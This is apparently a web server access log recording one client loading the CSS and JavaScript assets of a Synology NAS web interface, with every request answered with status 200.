[Client 84.1.26.27] [Length 1136] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/LogCenter/style.css?v=1657013615" [Client 84.1.26.27] [Length 2048] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ExternalDevices/style.css?v=1661421011" [Client 84.1.26.27] [Length 1004] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SupportForm/style.css?v=1661757678" [Client 84.1.26.27] [Length 494] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/scrollbar/flexcroll.css?v=1650348555" [Client 84.1.26.27] [Length 360] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/MyDSCenter/style.css?v=1661757678" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/syno-vue-components/style/syno-vue-components.css?v=1652869476" [Client 84.1.26.27] [Length 26445] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/style.css?v=1661421011" [Client 84.1.26.27] [Length 3239] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DiskMessageHandler/style.css?v=1661421011" [Client 84.1.26.27] [Length 575] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PersonalSettings/style.css?v=1661757678" [Client 84.1.26.27] [Length 4474] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/style.css?v=1661421011" [Client 84.1.26.27] [Length 2735] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SecurityScan/style.css?v=1652943644" [Client 84.1.26.27] [Length 4601] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/EnableNewUpdateSetting/style.css?v=1661421011" [Client 84.1.26.27] [Length 983] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/VideoPlayer2/style.css?v=1649656611" [Client 84.1.26.27] [Length 1998] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/style.css?v=1661757678" [Client 84.1.26.27] [Length 5292] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SharingManager/style.css?v=1661757678" [Client 84.1.26.27] [Length 229] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PhotoViewer/style.css?v=1661757678" [Client 84.1.26.27] [Length 3361] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/style.css?v=1661421011" [Client 84.1.26.27] [Length 6761] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DesktopProgress/style.css?v=1661757678" [Client 84.1.26.27] [Length 860] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ClipBoardJS/style.css?v=1661757678" [Client 84.1.26.27] [Length 387] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileChooserV6/style.css?v=1661757678" [Client 84.1.26.27] [Length 1098] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/style.css?v=1661421011" [Client 84.1.26.27] [Length 28078] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/OTPWizard/style.css?v=1661757678" [Client 84.1.26.27] [Length 870] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/C3/style.css?v=1661421011" [Client 84.1.26.27] [Length 780] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DataDrivenDocuments/style.css?v=1661421011" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AudioPlayer/style.css?v=1661757678" [Client 84.1.26.27] [Length 3921] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/style.css?v=1661757678" [Client 84.1.26.27] [Length 1934] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/WelcomeApp/style.css?v=1661421011" [Client 84.1.26.27] [Length 10609] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/style.css?v=1661757678" [Client 84.1.26.27] [Length 2159] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/style.css?v=1661226912" [Client 84.1.26.27] [Length 15876] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TaskSchedulerWidget/style.css?v=1661421011" [Client 84.1.26.27] [Length 989] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/style.css?v=1635321605" [Client 84.1.26.27] [Length 4624] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/style.css?v=1744186293" [Client 84.1.26.27] [Length 8535] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResetAdminApp/style.css?v=1661421011" [Client 84.1.26.27] [Length 514] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/style.css?v=1657097204" [Client 84.1.26.27] [Length 12126] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-Drive/style.css?v=1731304858" [Client 84.1.26.27] [Length 75196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/AudioStation/style.css?v=1670317322" [Client 84.1.26.27] [Length 17338] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/style.css?v=1661757678" [Client 84.1.26.27] [Length 5614] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DisableAdminNotification/style.css?v=1661421011" [Client 84.1.26.27] [Length 440] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/DownloadStation/style.css?v=1714372160" [Client 84.1.26.27] [Length 5968] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ConfigBackup/style.css?v=1660704937" [Client 84.1.26.27] [Length 1239] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/MediaServer/style.css?v=1733153684" [Client 84.1.26.27] [Length 877] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BandwidthControl/style.css?v=1634102886" [Client 84.1.26.27] [Length 72] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/ScsiTarget/style.css?v=1659958512" [Client 84.1.26.27] [Length 7620] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/OAuthService/style.css?v=1618330426" [Client 84.1.26.27] [Length 333] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/UpdateMaskApp/style.css?v=1661421011" [Client 84.1.26.27] [Length 481] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/WebStation/style.css?v=1648710000" [Client 84.1.26.27] [Length 4262] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/DirectoryServer/style.css?v=1657077274" [Client 84.1.26.27] [Length 1980] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyApplicationService/style.css?v=1675505560" [Client 84.1.26.27] [Length 2208] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Share/style.css?v=1661757678" [Client 84.1.26.27] [Length 1433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/adapter/ext/ext-base.js?v=1650348555" [Client 84.1.26.27] [Length 12041] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/ActiveInsight/style.css?v=1706865053" [Client 84.1.26.27] [Length 797] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/WebDAVServer/style.css?v=1767609886" [Client 84.1.26.27] [Length 294] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/HyperBackup/style.css?v=1666887595" [Client 84.1.26.27] [Length 20594] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/style.css?v=1711016943" [Client 84.1.26.27] [Length 102604] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/style.css?v=1657097197" [Client 84.1.26.27] [Length 644] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/LogCenter/style.css?v=1657880510" [Client 84.1.26.27] [Length 568] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CodecPack/style.css?v=1662540402" [Client 84.1.26.27] [Length 673] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/synowebapi.js/synowebapi.min.js?v=1653287912" [Client 84.1.26.27] [Length 12470] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VPNCenter/style.css?v=1656648365" [Client 84.1.26.27] [Length 1189] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/HybridShare/style.css?v=1761112552" [Client 84.1.26.27] [Length 1165] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynoFinder/style.css?v=1670389783" [Client 84.1.26.27] [Length 22699] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/AntiVirus/style.css?v=1676872996" [Client 84.1.26.27] [Length 5538] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vuex/vuex.min.js?v=1585722123" [Client 84.1.26.27] [Length 2978] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileChooser/style.css?v=1661757678" [Client 84.1.26.27] [Length 943] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/DhcpServer/style.css?v=1639559986" [Client 84.1.26.27] [Length 2034] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/synocredential.js/synocredential.min.js?v=1661507553" [Client 84.1.26.27] [Length 5114] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/style.css?v=1731304862" [Client 84.1.26.27] [Length 13455] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/sds/dist/dsm.common.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 19433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/desktop/dist/dsm.desktop.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 22969] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 8796] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" [Client 84.1.26.27] [Length 3834] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/constants.js?v=1650348555" [Client 84.1.26.27] [Length 898] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PollingTask/style.css?v=1661757678" [Client 84.1.26.27] [Length 609] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/vendor.js?v=1654081517" [Client 84.1.26.27] [Length 19196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/dsm.taskbar.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 32255] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[13/Jan/2026:11:08:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/style.css?v=1661757678" [Client 84.1.26.27] [Length 2311] [Gzip -] [Sent-to 192.168.100.30] 